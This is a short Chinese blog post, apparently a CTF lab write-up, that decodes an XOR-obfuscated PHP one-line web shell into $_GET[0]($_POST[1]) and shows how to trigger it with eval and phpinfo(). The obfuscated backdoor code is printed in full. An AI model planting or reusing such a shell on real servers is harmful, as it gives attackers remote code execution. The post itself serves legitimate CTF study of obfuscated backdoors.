PHP代码分析 CTF

1.练练墨者学院的靶机。关于php

打开如下图。

<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

2.先执行一下。

前三行为传参数。
$_   =  1
$__  = _GET
$___ = _POST
${$__}[!$_](${$___}[$_]) = ${_GET}[!1](${_POST}[1]); = ${_GET}[0](${_POST}[1]);

3.正常的一句话

eval($_POST[1])

这里是 ${_GET}[0](${_POST}[1])

所有 eval 也就是执行函数要使用get方式去传进去，然后post方式去条用可执行代码。

http://127.0.0.1/1.php?0=eval

1=phpinfo()

这样方式。

posted @ 2019-04-15 11:25 G0mini 阅读(331) 评论(0) 编辑收藏举报

刷新页面返回顶部

掌握在自己手中的才叫做命运